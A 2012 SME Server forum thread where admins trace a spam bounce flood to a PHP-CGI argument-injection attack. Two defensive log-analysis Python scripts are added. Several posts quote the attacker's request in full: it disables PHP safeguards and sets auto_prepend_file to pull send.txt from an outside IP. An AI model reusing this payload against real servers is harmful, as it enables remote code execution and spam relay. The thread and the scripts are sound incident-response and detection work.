Koozali.org: home of the SME Server

Thousands of Failure Notice Messages - Help

Smitro
Thousands of Failure Notice Messages - Help
« on: May 26, 2012, 01:23:22 AM »
Hi,

It would appear that my server is being used for spam, as I'm getting thousands of failure notices coming back to the account "anonymous@mydomain". The message it was trying to send was viruses and all sorts of spam. After reading the failure message I'm pretty sure the message is coming from my server.

I can see a stack of messages in /var/log/qpsmtpd/current, but I'm not sure how they are originating. Can someone help me, where else can I look?

Here is an example of the log:
2012-05-26 03:55:07.382094500 440 Accepted connection 0/40 from 114.44.101.166 / 114-44-101-166.dynamic.hinet.net
2012-05-26 03:55:07.382421500 440 Connection from 114-44-101-166.dynamic.hinet.net [114.44.101.166]
2012-05-26 03:55:07.383756500 440 running plugin (set_hooks): peers
2012-05-26 03:55:07.387229500 440 peers hooking valid_auth
2012-05-26 03:55:07.387433500 440 peers hooking set_hooks
2012-05-26 03:55:07.388470500 440 logging::logterse hooking queue
2012-05-26 03:55:07.388717500 440 logging::logterse hooking deny
2012-05-26 03:55:07.389495500 440 tls plugin (init): ciphers: ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM
2012-05-26 03:55:07.391418500 440 tls hooking connect
2012-05-26 03:55:07.391579500 440 tls hooking ehlo
2012-05-26 03:55:07.391697500 440 tls hooking helo
2012-05-26 03:55:07.391923500 440 tls hooking rcpt
2012-05-26 03:55:07.392044500 440 tls hooking mail
2012-05-26 03:55:07.392175500 440 tls hooking data
2012-05-26 03:55:07.392381500 440 tls hooking post-connection
2012-05-26 03:55:07.392506500 440 tls hooking unrecognized_command
2012-05-26 03:55:07.395020500 440 check_earlytalker hooking connect
2012-05-26 03:55:07.395170500 440 check_earlytalker hooking data
2012-05-26 03:55:07.395636500 440 count_unrecognized_commands hooking connect
2012-05-26 03:55:07.396129500 440 count_unrecognized_commands hooking unrecognized_command
2012-05-26 03:55:07.396670500 440 check_relay hooking connect
2012-05-26 03:55:07.397503500 440 check_norelay hooking connect
2012-05-26 03:55:07.398531500 440 require_resolvable_fromhost hooking mail
2012-05-26 03:55:07.399577500 440 check_basicheaders hooking data_post
2012-05-26 03:55:07.400497500 440 check_badmailfrom hooking rcpt
2012-05-26 03:55:07.400649500 440 check_badmailfrom hooking mail
2012-05-26 03:55:07.401463500 440 check_badrcptto_patterns hooking rcpt
2012-05-26 03:55:07.402271500 440 check_badrcptto hooking rcpt
2012-05-26 03:55:07.402904500 440 check_spamhelo hooking ehlo
2012-05-26 03:55:07.403033500 440 check_spamhelo hooking helo
2012-05-26 03:55:07.404258500 440 check_goodrcptto hooking rcpt
2012-05-26 03:55:07.404820500 440 rcpt_ok hooking rcpt
2012-05-26 03:55:07.406106500 440 virus::pattern_filter hooking data_post
2012-05-26 03:55:07.407008500 440 tnef2mime hooking data_post
2012-05-26 03:55:07.407780500 440 spamassassin hooking data_post
2012-05-26 03:55:07.408145500 440 spamassassin hooking data_post
2012-05-26 03:55:07.408264500 440 spamassassin hooking data_post
2012-05-26 03:55:07.408976500 440 virus::clamav hooking data_post
2012-05-26 03:55:07.410229500 440 queue::qmail_2dqueue hooking queue
2012-05-26 03:55:07.411386500 440 Plugin peers, hook set_hooks returned DECLINED,
2012-05-26 03:55:07.411678500 440 running plugin (connect): tls
2012-05-26 03:55:07.411864500 440 Plugin tls, hook connect returned DECLINED,
2012-05-26 03:55:07.411931500 440 running plugin (connect): check_earlytalker
2012-05-26 03:55:08.412203500 440 check_earlytalker plugin (connect): remote host said nothing spontaneous, proceeding
2012-05-26 03:55:08.412410500 440 Plugin check_earlytalker, hook connect returned DECLINED,
2012-05-26 03:55:08.412486500 440 running plugin (connect): count_unrecognized_commands
2012-05-26 03:55:08.412672500 440 Plugin count_unrecognized_commands, hook connect returned DECLINED,
2012-05-26 03:55:08.412738500 440 running plugin (connect): check_relay
2012-05-26 03:55:08.413013500 440 trying to get config for relayclients
2012-05-26 03:55:08.414290500 440 trying to get config for morerelayclients
2012-05-26 03:55:08.414718500 440 Plugin check_relay, hook connect returned DECLINED,
2012-05-26 03:55:08.414791500 440 running plugin (connect): check_norelay
2012-05-26 03:55:08.414925500 440 trying to get config for norelayclients
2012-05-26 03:55:08.415619500 440 Plugin check_norelay, hook connect returned DECLINED,
2012-05-26 03:55:08.415789500 440 trying to get config for smtpgreeting
2012-05-26 03:55:08.416263500 440 220 box1.mailoz.com ESMTP
2012-05-26 03:55:08.416452500 440 trying to get config for timeoutsmtpd
2012-05-26 03:55:09.949349500 440 dispatching HELO 203.45.106.155
2012-05-26 03:55:09.950107500 440 running plugin (helo): tls
2012-05-26 03:55:09.950330500 440 Plugin tls, hook helo returned DECLINED,
2012-05-26 03:55:09.950401500 440 running plugin (helo): check_spamhelo
2012-05-26 03:55:09.950534500 440 trying to get config for badhelo
2012-05-26 03:55:09.951396500 440 Plugin check_spamhelo, hook helo returned DECLINED,
2012-05-26 03:55:09.951651500 440 trying to get config for me
2012-05-26 03:55:09.952099500 440 250 mailoz.com Hi 114-44-101-166.dynamic.hinet.net [114.44.101.166]; I am so happy to meet you.
2012-05-26 03:55:10.895886500 440 dispatching MAIL FROM: <k8fj899@kiss99.com>
2012-05-26 03:55:10.896599500 440 full from_parameter: FROM: <k8fj899@kiss99.com>
2012-05-26 03:55:10.897117500 440 from email address : [<k8fj899@kiss99.com>]
2012-05-26 03:55:10.898257500 440 running plugin (mail): tls
2012-05-26 03:55:10.898488500 440 Plugin tls, hook mail returned DECLINED,
2012-05-26 03:55:10.898557500 440 running plugin (mail): require_resolvable_fromhost
2012-05-26 03:55:10.898741500 440 trying to get config for invalid_resolvable_fromhost
2012-05-26 03:55:10.900724500 440 trying to get config for require_resolvable_fromhost
2012-05-26 03:55:12.257707500 440 Plugin require_resolvable_fromhost, hook mail returned DECLINED,
2012-05-26 03:55:12.257775500 440 running plugin (mail): check_badmailfrom
2012-05-26 03:55:12.257970500 440 trying to get config for badmailfrom
2012-05-26 03:55:12.258765500 440 Plugin check_badmailfrom, hook mail returned DECLINED,
2012-05-26 03:55:12.259036500 440 getting mail from <k8fj899@kiss99.com>
2012-05-26 03:55:12.259188500 440 250 <k8fj899@kiss99.com>, sender OK - how exciting to get mail from you!
2012-05-26 03:55:12.784869500 440 dispatching RCPT TO: <smtp@k888.tw>
2012-05-26 03:55:12.785552500 440 to email address : [<smtp@k888.tw>]
2012-05-26 03:55:12.786020500 440 running plugin (rcpt): tls
2012-05-26 03:55:12.786226500 440 Plugin tls, hook rcpt returned DECLINED,
2012-05-26 03:55:12.786296500 440 running plugin (rcpt): check_badmailfrom
2012-05-26 03:55:12.786434500 440 Plugin check_badmailfrom, hook rcpt returned DECLINED,
2012-05-26 03:55:12.786499500 440 running plugin (rcpt): check_badrcptto_patterns
2012-05-26 03:55:12.786656500 440 trying to get config for badrcptto_patterns
2012-05-26 03:55:12.787795500 440 Plugin check_badrcptto_patterns, hook rcpt returned DECLINED,
2012-05-26 03:55:12.787866500 440 running plugin (rcpt): check_badrcptto
2012-05-26 03:55:12.788010500 440 trying to get config for badrcptto
2012-05-26 03:55:12.800894500 440 Plugin check_badrcptto, hook rcpt returned DECLINED,
2012-05-26 03:55:12.800967500 440 running plugin (rcpt): check_goodrcptto
2012-05-26 03:55:12.801176500 440 check_goodrcptto plugin (rcpt): stripping '-' extensions
2012-05-26 03:55:12.801279500 440 trying to get config for goodrcptto
2012-05-26 03:55:12.903460500 440 check_goodrcptto plugin (rcpt): address includes extn '-', checking users: smtp
2012-05-26 03:55:12.955340500 440 check_goodrcptto plugin (rcpt): recipient smtp@k888.tw denied
2012-05-26 03:55:12.957681500 440 Plugin check_goodrcptto, hook rcpt returned DENY, relaying denied smtp@k888.tw
2012-05-26 03:55:12.960785500 440 logging::logterse plugin (deny): ` 114.44.101.166   114-44-101-166.dynamic.hinet.net   203.45.106.155   <k8fj899@kiss99.com>      check_goodrcptto   901   relaying denied smtp@k888.tw   msg denied before queued
2012-05-26 03:55:12.961165500 440 550 relaying denied smtp@k888.tw
2012-05-26 03:55:13.568516500 440 running plugin (post-connection): tls
2012-05-26 03:55:13.568943500 440 Plugin tls, hook post-connection returned DECLINED,
2012-05-26 03:55:14.274052500 4225 cleaning up after 440
2012-05-26 03:55:22.921307500 4225 running plugin (pre-connection): hosts_allow
2012-05-26 03:55:22.921653500 4225 Plugin hosts_allow, hook pre-connection returned DECLINED,

I'm sure I've probably done something wrong... just not sure what...

I've checked for an open relay and all tests say the server is not.
.........

CharlieBrady
Re: Thousands of Failure Notice Messages - Help
« Reply #1 on: May 26, 2012, 02:13:09 AM »
it would appear that my server is being used for spam, as I'm getting thousands of failure notices coming back to the account "anonymous@mydomain".

Well, that is interesting, but it would be more interesting if you actually told us more about those failure notices.

Quote
The message that was trying to send was viruses and all sorts of spam.

The most likely cause of that is a workstation on your LAN running Windows and being infected by malware. You need to identify that workstation, disconnect it, and fix it (e.g. you could replace it by a Mac or a Linux system).

Quote
After reading the failure message I'm pretty sure the message is coming from my server.

Since you haven't shown us a failure message we cannot confirm that for you.

Quote
I can see a stack of messages in /var/log/qpsmtpd/current, but I'm not sure how they are originating. Can someone help me, where else can I look?

Here is an example of the log:

That just shows a spammer (at 114-44-101-166.dynamic.hinet.net [114.44.101.166]) trying to relay via your server and being told to go away. Not relevant.
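To tell rejected relay attempts like the one above from mail the server actually accepted, the logterse summary lines in /var/log/qpsmtpd/current can be tallied instead of read one transaction at a time. The following Python is an added example, not code from this thread or from SME Server. It assumes logterse writes a backtick followed by tab-separated fields in the order they appear in Smitro's excerpt (remote IP, remote host, HELO name, envelope sender, envelope recipient, plugin, return code, message, final status); the sample lines are constructed, with the tabs restored, and the "queued" line and its return code are invented to show the accepted case beside the rejected one.

```python
import re
from collections import Counter

# Constructed sample lines (tabs restored) in the shape of Smitro's
# /var/log/qpsmtpd/current excerpt. Assumption: logterse writes a backtick and
# then tab-separated fields: remote_ip, remote_host, helo, mail_from, rcpt_to,
# plugin, return code, message, final status. The "queued" line and its code
# are constructed to show the accepted case alongside the rejected one.
SAMPLE_LOG = (
    "2012-05-26 03:55:12.960785500 440 logging::logterse plugin (deny): `\t"
    "114.44.101.166\t114-44-101-166.dynamic.hinet.net\t203.45.106.155\t"
    "<k8fj899@kiss99.com>\t\tcheck_goodrcptto\t901\trelaying denied smtp@k888.tw\t"
    "msg denied before queued\n"
    "2012-05-26 03:55:12.961165500 440 550 relaying denied smtp@k888.tw\n"
    "2012-05-26 03:57:01.100000500 441 logging::logterse plugin (queue): `\t"
    "192.0.2.10\tmail.example.test\tmail.example.test\t<alice@example.test>\t"
    "<bob@mydomain>\tqueue::qmail_2dqueue\t902\t\tqueued\n"
    "2012-05-26 03:58:40.200000500 442 logging::logterse plugin (deny): `\t"
    "198.51.100.7\tunknown\t198.51.100.7\t<spam@example.net>\t\t"
    "check_goodrcptto\t901\trelaying denied bob@elsewhere.test\t"
    "msg denied before queued\n"
)

# The hook name in parentheses is "deny" or "queue" (both hooks appear in the
# "logging::logterse hooking ..." lines of the excerpt).
LOGTERSE_RE = re.compile(
    r"logging::logterse plugin \((?P<hook>\w+)\): `\t(?P<fields>.*)$")
FIELD_NAMES = ("remote_ip", "remote_host", "helo", "mail_from", "rcpt_to",
               "plugin", "code", "message", "status")


def parse_logterse(line):
    """Return the logterse summary of one log line as a dict, or None when the
    line is per-plugin chatter or an SMTP reply rather than a summary."""
    m = LOGTERSE_RE.search(line.rstrip("\n"))
    if not m:
        return None
    fields = m.group("fields").split("\t")
    fields += [""] * (len(FIELD_NAMES) - len(fields))  # pad short lines
    record = dict(zip(FIELD_NAMES, fields))
    record["hook"] = m.group("hook")
    # A transaction logged from the deny hook never reached the queue, so it
    # cannot be the origin of a bounce arriving later.
    record["denied"] = record["hook"] == "deny" or "denied" in record["status"]
    return record


def summarize(log_text):
    """Count accepted vs. rejected transactions and attribute the rejections to
    the plugin and the remote IP involved."""
    counts = Counter()
    by_plugin = Counter()
    by_remote = Counter()
    for line in log_text.splitlines():
        rec = parse_logterse(line)
        if rec is None:
            continue
        if rec["denied"]:
            counts["denied"] += 1
            by_plugin[rec["plugin"]] += 1
            by_remote[rec["remote_ip"]] += 1
        else:
            counts["queued"] += 1
    return {"denied": counts["denied"], "queued": counts["queued"],
            "by_plugin": dict(by_plugin), "by_remote": dict(by_remote)}


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG)
    print("queued:", summary["queued"], "denied:", summary["denied"])
    print("rejections by plugin:", summary["by_plugin"])
    print("rejections by remote IP:", summary["by_remote"])
```

Run against the real file, the "queued" count is the one that matters for a bounce flood: every message that later produced a failure notice had to pass through the queue hook first, whereas a "550 relaying denied" reply means the server refused the message outright.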


pcowley
Re: Thousands of Failure Notice Messages - Help
« Reply #2 on: May 26, 2012, 09:34:23 AM »
I too am having similar problems.

I don't have any windows PC attached to my network and it appears from what I have found to be a php injection attack.  It appears to cause a text file with a huge number of email addresses to be read and an email with a virus attached sent to each one. Since the vast majority of the email addresses are bogus most come back as failures.

Here is what I find in the http/access log file

xxx.org  213.152.180.178 - - [26/May/2012:19:12:18 +1200] "POST /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Fsend.txt HTTP/1.1" 200 7338 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Firefox/11.0"

I also found what appears to be a very dubious script called image.php in the upload directory of one of my websites that allows files to be uploaded. The .htaccess did not have a block in it to prohibit the uploading of php files at the time.

In the mail log file (sendmail style log) for every bogus email there is a line like this:


1337959090.848407500 qp 8657: to=remote.richardshelley9066@comcast.net, uid=102, ddelay=4901.358381, xdelay=1.110359, stat=Deferred (Connected_to_68.87.26.147_but_greeting_failed./Remote_host_said:_554_imta27.westchester.pa.mail.comcast.net_comcast_203.97.110.170_found_on_one_or_more_DNSBLs,_see_http://postmaster.comcast.net/smtp-error-codes.php#BL000010/)

Note the UID is 102 for WWW, which implies it is coming from the webserver, and the php code above seems to clearly confirm it.

All the websites that were used (and there seems to be about 3) are running a CMS under php5 (even though I am still on smeserver 7.5.1 - I have the PHP5 contrib installed)

I'd really like to know how to plug whatever hole this is.

Can anyone help? My Linux skills are intermediate.

Cheers
Pete
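The two log lines pcowley quotes are enough to build a check that an admin can run over a whole log directory: flag any request whose query string is really a set of php-cgi command-line options (no literal "=" in the raw query, and a leading "-" once decoded), list the ini directives it sets, and count mail deliveries per sending uid so that mail originating from the web server user stands out. The following Python is an added example, not code from this thread or from SME Server; the access-log and mail-log lines are constructed in the shape of pcowley's excerpts (the first access-log line reuses his values), the uid 5001 line is invented as a non-web sender, and the uid 102 = www mapping is taken from his post.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample data (not from any real server), shaped like the excerpts
# pcowley posted: one Apache access-log line carrying php-cgi "-d" directives in
# the query string, two ordinary requests, and sendmail-style qmail log lines.
ACCESS_LOG = """\
xxx.org  213.152.180.178 - - [26/May/2012:19:12:18 +1200] "POST /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Fsend.txt HTTP/1.1" 200 7338 "-" "Mozilla/5.0"
xxx.org  192.0.2.5 - - [26/May/2012:19:13:02 +1200] "GET /index.php?page=-1 HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
xxx.org  198.51.100.9 - - [26/May/2012:19:14:45 +1200] "GET /images/logo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# uid 102 is the web server user on pcowley's system; uid 5001 is a constructed
# ordinary sender so that the two can be compared.
MAIL_LOG = """\
1337959090.848407500 qp 8657: to=remote.user1@example.test, uid=102, ddelay=4901.358381, xdelay=1.110359, stat=Deferred (Connected_but_greeting_failed)
1337959091.120000500 qp 8657: to=remote.user2@example.test, uid=102, ddelay=4902.000000, xdelay=0.900000, stat=Deferred (Connected_but_greeting_failed)
1337959095.500000500 qp 8660: to=remote.pete@example.test, uid=5001, ddelay=1.000000, xdelay=0.500000, stat=Sent (250_ok)
"""

# Apache combined format, optionally prefixed with the virtual host name as in
# pcowley's excerpt.
ACCESS_RE = re.compile(
    r'^(?:(?P<vhost>[\w.-]+)\s+)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ '
    r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def php_cgi_directives(target):
    """Return {ini_key: value} when the request's query string looks like
    php-cgi command-line arguments, otherwise None.

    The signature is a raw query string with no literal '=' (an '=' would make
    it an ordinary key=value query) whose URL-decoded form starts with '-'."""
    query = urlsplit(target).query
    if not query or "=" in query:
        return None
    decoded = unquote_plus(query)
    if not decoded.startswith("-"):
        return None
    directives = {}
    for token in decoded.split():
        if token.startswith("-d"):
            key, _, value = token[2:].partition("=")
            directives[key] = value
    return directives


def scan_access_log(text):
    """One finding per request whose query string is php-cgi style argv."""
    findings = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        directives = php_cgi_directives(m.group("target"))
        if directives is None:
            continue
        findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": int(m.group("status")),
                         "directives": directives})
    return findings


MAIL_RE = re.compile(r"uid=(?P<uid>\d+),.*?stat=(?P<stat>\w+)")


def deliveries_by_uid(text):
    """Count delivery outcomes per sending uid; a large count under the web
    server's uid points at mail injected through the web server."""
    tally = defaultdict(Counter)
    for line in text.splitlines():
        m = MAIL_RE.search(line)
        if m:
            tally[m.group("uid")][m.group("stat")] += 1
    return {uid: dict(c) for uid, c in tally.items()}


if __name__ == "__main__":
    for f in scan_access_log(ACCESS_LOG):
        print(f["ts"], f["ip"], "HTTP", f["status"], "php-cgi directives:", f["directives"])
    for uid, stats in deliveries_by_uid(MAIL_LOG).items():
        print("uid", uid, stats)
```

The HTTP status in each finding is worth keeping: a 200 against a query like the one above means the request was served rather than refused, which is what makes pcowley's line evidence of a compromise rather than of a blocked probe.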

janet
Re: Thousands of Failure Notice Messages - Help
« Reply #3 on: May 26, 2012, 09:41:34 AM »
pcowley

Quote
I am still on smeserver 7.5.1 - I have the PHP5 contrib installed
I'd really like to know how to plug whatever hold this is.

Well that contrib has a security problem, that may be why.
See
http://forums.contribs.org/index.php/topic,48612.0.html

As far as fixing your broken system, you may need to reinstall a fresh (blank) sme operating system and then restore from a known good backup (pre hack), unless you have the troubleshooting skills to track down and remove all hacks.
Please search before asking, an answer may already exist.
The Search & other links to useful information are at top of Forum.

pcowley
Re: Thousands of Failure Notice Messages - Help
« Reply #4 on: May 26, 2012, 10:29:23 AM »
Hi Mary

Thanks for putting me on to that! 

I desperately want to upgrade to 8 when it comes out - hopefully really soon. In the meantime I am applying the .htaccess patches to the websites that are running php5.

Cheers
Pete

TerryF
Re: Thousands of Failure Notice Messages - Help
« Reply #5 on: May 26, 2012, 11:31:04 AM »
I desperately want to upgrade to 8 when it comes out - hopefully really soon.

It's on the mirrors now.. have now installed twice, all good..
--
qui scribit bis legit

cactus
Re: Thousands of Failure Notice Messages - Help
« Reply #6 on: May 26, 2012, 01:47:04 PM »
Here is what I find in the http/access log file

xxx.org  213.152.180.178 - - [26/May/2012:19:12:18 +1200] "POST /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Fsend.txt HTTP/1.1" 200 7338 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Firefox/11.0"
Someone for sure is trying to exploit your PHP installation on your server by means of shell shovelling.
The method used only works if you have PHP configured in CGI mode, which is what is done by the php5-cgi contrib. I seriously advise you to disable the affected ibays and to remove the php5-cgi contrib.

If you need PHP5 you should now be able to upgrade to SME Server 8, which natively has PHP5 included.
Be careful whose advice you buy, but be patient with those who supply it. Advice is a form of nostalgia, dispensing it is a way of fishing the past from the disposal, wiping it off, painting over the ugly parts and recycling it for more than its worth ~ Baz Luhrmann - Everybody's Free (To Wear Sunscreen)

cactus
Re: Thousands of Failure Notice Messages - Help
« Reply #7 on: May 26, 2012, 01:50:08 PM »
I raised a bug against the php5-cgi contrib, IMHO it should be removed from the repositories to prevent others from having security breaches like yours, see http://bugs.contribs.org/show_bug.cgi?id=6935
Be careful whose advice you buy, but be patient with those who supply it. Advice is a form of nostalgia, dispensing it is a way of fishing the past from the disposal, wiping it off, painting over the ugly parts and recycling it for more than its worth ~ Baz Luhrmann - Everybody's Free (To Wear Sunscreen)

Smitro
Re: Thousands of Failure Notice Messages - Help
« Reply #8 on: May 26, 2012, 06:55:04 PM »
You know, I think you've hit the nail on the head. I've seen that exact line in the http access log file and thought it looked bad, but could not find any more info as to what effect it had. My hope was that it was no more than a failed attempt. Obviously not.

I'm in the same boat as pcowley, I've been hanging out for SME 8, but thought I better wait for it to be in production before upgrading. I guess all I'm waiting for is the ok from the developers.
.........

CharlieBrady
Re: Thousands of Failure Notice Messages - Help
« Reply #9 on: May 26, 2012, 06:58:22 PM »
I raised a bug against the php5-cgi contrib, IMHO it should be removed from the repositories to prevent others from having security breaches like yours, see http://bugs.contribs.org/show_bug.cgi?id=6935

Perhaps it should be replaced in the repositories with an empty rpm. Or maybe they have come out with a proper fix now, and the contrib can be fixed. One would hope that whoever is maintaining that contrib takes a problem like this seriously and deals with the problem diligently.

Smitro
Re: Thousands of Failure Notice Messages - Help
« Reply #10 on: May 26, 2012, 07:02:44 PM »
Just realised after my last post that 8.0 has just been released! Hooray! I'm going to buy some new hardware then make the move!

I'd never say a bad word about SME, but PHP5 was long overdue. Thanks.
.........